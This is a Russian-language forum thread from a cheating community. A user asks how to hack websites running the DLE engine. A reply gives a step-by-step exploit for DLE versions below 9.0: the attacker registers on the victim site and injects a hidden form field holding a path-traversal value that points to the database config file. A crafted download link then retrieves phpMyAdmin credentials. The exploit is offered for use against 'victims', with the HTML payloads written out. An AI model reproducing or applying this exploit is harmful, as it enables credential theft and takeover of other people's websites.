Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

взлом дле

-

Школа Читера

- Основы основ - начинаем писать статьи для начинающих с целью создания полноценного раздела

Ответ
 
Опции темы
Старый 14.03.2011, 15:48   #1
 Разведчик
Аватар для tatarrr
 
tatarrr никому не известный тип
Регистрация: 14.03.2011
Сообщений: 0
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию взлом дле

Народ, помогите пожайлуста. Как то выкладывали давно тему о зломе сайта на движке dle. Типо придобавлении новости открываешь загрузку файла, открываешь исходный код, встовляешь какие то 2 строчки, и потом можешь скачать лбой файл с сайта, изменить его и обратно загрузить. Вот можете рассказать по подробнее. А то я н помню какие строчки встовлять и куда. И как особенно интересует взломать дле 9.2, чтоб также изменять файлы на сервере.
  Ответить с цитированием
Старый 27.06.2011, 21:15   #2
 Разведчик
Аватар для monah1994
 
monah1994 никому не известный тип
Регистрация: 19.04.2010
Сообщений: 0
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: взлом дле

профикшено везде уже)

ну а так вот держи)


Взлом сайта на DLE версии ниже 9.0, инструкция (Работаем через браузер Opera 10).

1. Заходим на сайт жертвы

2. Регистрируемся и авторизуемся на сайте

3. Переходим по ссылке [Ссылки могут видеть только зарегистрированные пользователи. ] (где site.ru - адрес жертвы)

4. Открываем исходный код открытой нами страницы и после:

<input type="hidden" name="area" value=''>


(строка может немного отличаться и повторяться 2 раза, вставляем после 1й)

вставляем:

<input type="hidden" name="serverfile" value='../../engine/data/dbconfig.php'>


Нажимаем в браузере, под вкладками Применить изменения

5. После этих действий необходимо проверить работоспособность дырки, для этого на странице [Ссылки могут видеть только зарегистрированные пользователи. ], чей исходный код мы редактировали пунктом выше, нажимаем Загрузить. В списке загруженных файлов должен появиться dbconfig.php, мы можем продолжить...

Что бы скачать файл конфига мы должны навести на него указатель мыши и посмотреть ID, затем через Исходный код страницы / Применить изменения мы вставляем в любое место страницы сайта жертвы ссылку вида:

<a href='http://site.ru/engine/download.php?id=ID_файла'>[download]</a>


и скачиваем файл dbconfig.php с данными для входа в phpMyAdmin, адрес которой обычно site.ru/phpmyadmin/ или site.ru/myadmin/
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Статья] CF ВЗЛОМ ganjybas_man Общение и обсуждение CrossFire 0 30.08.2010 00:29

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 19:07.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net